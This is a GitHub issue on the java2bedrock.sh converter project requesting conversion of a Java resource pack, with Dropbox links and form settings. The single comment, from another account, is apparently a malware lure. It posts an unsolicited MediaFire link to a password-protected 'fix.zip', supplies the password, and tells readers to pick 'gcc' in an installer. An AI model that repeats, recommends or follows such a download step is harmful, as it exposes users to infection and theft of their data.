### ISSUE TITLE
[Pack]: 

### ISSUE THREAD

**Issue by Darkshadowx20** [Kas-tle/java2bedrock.sh#33431]
### Java Pack Direct Download URL

https://www.dropbox.com/scl/fi/ao5f5mz1y36lqq4jd9nki/SABER.zip?rlkey=5chv9j94udo04xzzm5dvnszx4&st=wt079yu4&dl=1

### Bedrock Merge Pack Direct Download URL

https://www.dropbox.com/scl/fi/42gbkj3no19ks6tj2rntn/bedrock.mcpack?rlkey=jqz6ykkw3k6adgy3a4z1pn1j3&st=8csja54r&dl=1

### Default Assets Version

1.20.1

### Block Material

None

### Attachable Material

None

### Archive Scratch Files

None

### Rename Model Files

true

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct. I have permission to use all assets I have linked to within this form.

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
